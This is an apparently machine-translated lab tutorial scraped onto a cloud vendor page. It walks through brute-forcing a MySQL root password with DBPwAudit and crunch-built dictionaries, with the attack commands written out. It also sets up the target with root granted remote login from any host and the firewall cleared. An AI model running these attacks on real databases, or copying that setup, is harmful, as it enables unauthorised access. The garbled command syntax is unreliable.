Database password cracking (take cracking mysql database as an example) Experiment

Source: Internet
Author: User
Tags ibm db2

1. Common Database types include SQLServer, MySql, IBM DB2, and Oracle.


2. DBPwAudit database password cracking tool

1) function: Performs brute force password cracking on the target database by attaching a dictionary. Currently, the supported databases include SQLServer, MySQL, Oracle, and DB2.


2) install DBPwAudit:


Figure 1. Upload the software package used in the experiment

Note: # crunch password dictionary generation tool

# Driver required by mysql-cennector-java password cracking tool (Note: different database types and different drivers)

# Dbpwaudit database password cracking main program


Figure 2. decompress the dbpwaudit package

[Root @ attack ~] # Unzip


3) Database Password dbpwaudit format

Note: first copy the *. jar driver to the/root/DBPwAudit/jdbc directory.

DBPwAudit-s <server>-d <db>-D <driver>-U <users>-P <passwords> [options]

-S-Server name or address. # specify the database IP address

-P-Port of database server/instance. # specify the database server Port

-D-Database/Instancename to audit. # specify the Database Name

-D-Thealiasof the driver to use (-Lforaliases) # specify the database type (Oracle, MySQL, MSSql, DB2)

-U-File containing usernames to guess. # user dictionary File

-P-File containing passwords to guess. # password dictionary File

-L-List driver aliases. # List the supported database driver aliases


Oracle-oracle. jdbc. driver. OracleDriver

MySQL-com. mysql. jdbc. Driver

MSSql-com. microsoft. sqlserver. jdbc. SQLServerDriver

DB2-com. ibm. db2.jcc. DB2Driver


4) method 1. Crack the SQL Server database

#./Dbpwaudit. sh-s IP-d master (Database Name)-D mssql (Database Type)-U username (dictionary)-P password (dictionary)

Method 2: crack the MySql database

#./Dbpwaudit. sh-s IP-d mysql (Database Name)-D MySQL (Database Type)-U username (dictionary)-P password (dictionary)

Note: The driver must be manually imported. Create your own dictionary


5) decompress the mysql database driver package

[Root @ attack ~] # Tar-zxvf mysql-connector-java-5.1.24.tar.gz


6) manually copy the *. jar driver to the "jdbc" directory.

[Root @ attack ~] # Cp mysql-connector-java-5.1.24/mysql-connector-java-5.1.24-bin.jar DBPwAudit/jdbc/


3. Generate a password dictionary file using crunch


1) usage of crunch: dictionary generation tool


2) tool features:

· Generate dictionary files by means of permutation and combination

· The generation process can be interrupted by the number of rows or file size

· Supports generating dictionary files that combine numbers and symbols

· Supports case-sensitive letters

· Add a status report when multiple files are generated


3), tools more information and download:


4) Installation of the crunch Tool


Figure 1. decompress the crunch compressed package

[Root @ attack ~] # Tar-xvf crunch-3.4.tgz


Figure 2. make Compilation

[Root @ attack ~] # Cdcrunch-3.4

[Root @ localhost crunch-3.4] # make

Building binary...

/Usr/bin/gcc-pthread-Wall-pedantic-std = c99 crunch. c-lm-o crunch


Figure 3 install

[Root @ localhost crunch-3.4] # make install


5) use the crunch format


Usage 1: #./The possibility of the maximum number of digits in the shortest number of passwords-o generate a password dictionary

#./Crunch 5 5 1234567890-o pass1.dic

Usage 2: #./crunch the maximum number of digits in the shortest charset. lst (policy set)-o generate password dictionary

#./Crunch 6 8 charset. lst mixalpha-numeric-all-space-o pass2.dic


6) generate a password dictionary

[Root @ attack crunch-3.4] #/pentest/passwords/crunch 8 8 charset. lst lalpha-o pass2.dic

Note: In this experiment, the contents of the password dictionary file are manually generated by us, because the number of lines of the dictionary files with 8-bit length and all-lowercase characters is greater than 10 million lines. The required memory and other resources are many. A memory overflow error is reported when DBPwatdit is used for cracking.

[Root @ attack crunch-3.4] # cat <EOF> ~ /Crunch-3.4/pass2.dic # (manually generate the password file)

> 123456

> 654321

> 111111

> 666666

> Password

> Toor

> Root

> Admin

> Guest



7) generate account dictionary files

[Root @ attack crunch-3.4] # vi pass1.dic


4. Install the target mysql database and set the password (


1) install and start the mysql Service

[Root @ mysql ~] # Netstat-tunapl | grep mysql

[Root @ mysql ~] # Yum install-y mysql-server mysql

[Root @ mysql ~] # Service mysqld start

Initialize the MySQL database: Installing MySQL system tables...

Starting mysqld: [OK]

[Root @ mysql ~] # Chkconfig mysqld on

[Root @ mysql ~] # Netstat-tunapl | grep mysql

Tcp 0 0 3306 * LISTEN 2663/mysqld


2) set the administrator password for mysql

[Root @ mysql ~] # Mysqladmin-u root password "password"

[Root @ mysql ~] # Mysql-u root-p

Enter password:

Welcome to the MySQL monitor. Commands end with; or \ g.

Your MySQL connection id is 5

Server version: 5.1.67 Source distribution

Copyright (c) 2000,201 2, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its

Affiliates. Other names may be trademarks of their respective


Type 'help; 'or' \ H' for help. type' \ C' to clear the current input statement.

Mysql> exit



3) authorize Remote Login

[Root @ mysql ~] # Mysql-u root-p

Enter password:

Mysql> grant all on *. * to 'root' @ '%' identified by "password ";

Query OK, 0 rows affected (0.00 sec)

Mysql> flush privileges;

Query OK, 0 rows affected (0.00 sec)

Mysql> exit



4) Firewall iptables settings (Here we clear the firewall)

[Root @ mysql ~] # Iptables-L

Chain INPUT (policy ACCEPT)

Target prot opt source destination

Chain FORWARD (policy ACCEPT)

Target prot opt source destination

Chain OUTPUT (policy ACCEPT)

Target prot opt source destination


5) add Port 3306 to the Security Group on the cloudstack Management page.

5. mysql database password cracking


1) try to crack the Database Password

[Root @ attack ~] # Cd ~ /DBPwAudit/

[Root @ attack DBPwAudit] #. /dbpwaudit. sh-s mysql-D MySQL-U .. /crunch-3.4/pass1.dic-P .. /crunch-3.4/pass2.dic



2) Results After cracking


3) Verification

[Root @ attack DBPwAudit] # mysql-u root-h

Enter password:

---------- Mysql database password cracking is now complete

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.